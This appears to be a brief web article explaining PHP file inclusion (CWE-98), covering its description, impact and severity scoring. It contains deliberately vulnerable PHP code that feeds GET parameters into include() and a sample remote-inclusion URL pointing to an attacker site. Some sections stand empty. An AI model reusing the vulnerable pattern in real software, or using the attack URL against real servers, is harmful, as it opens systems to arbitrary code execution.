PHP File Inclusion [CWE-98] — The Hacktivists

1. Description
………………………………

This weakness occurs when a PHP application receives input and uses it to include files via include(), require(), or similar functions. This results in the inclusion of attacker-controlled files, which might lead to information disclosure or execution of arbitrary code. There are two types of inclusion based on the location of the file to include. They are referred to as local and remote file inclusion.

$filename = $_GET["filename"];
Include($_SERVER["DOCUMENT_ROOT"]."/". $filename.".php");
$dir = $_GET["path"];
include($dir . "/file.inc");
vulnerable.php?path=http://attacker-site

2. Potential impact
………………………………

Successful exploitation of PHP file inclusion may result in information disclosure or compromise of the vulnerable system. A remote attacker can read and write files or execute arbitrary code on the target system with the privileges of the webserver.

3. Attack patterns
………………………………

In the CAPEC database, this weakness is treated as:

4. Affected software
………………………………

Web applications written in PHP are potentially vulnerable to this weakness.

5. Exploitation Examples
………………………………

Let’s have a look at the HTB23084 security advisory (CVE-2012–1933).

6. Severity and CVSS Scoring
……………………………………..

This weakness potentially allows unauthorized code execution on a remote system. It should be scored with maximum confidentiality, integrity, and availability ratings.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store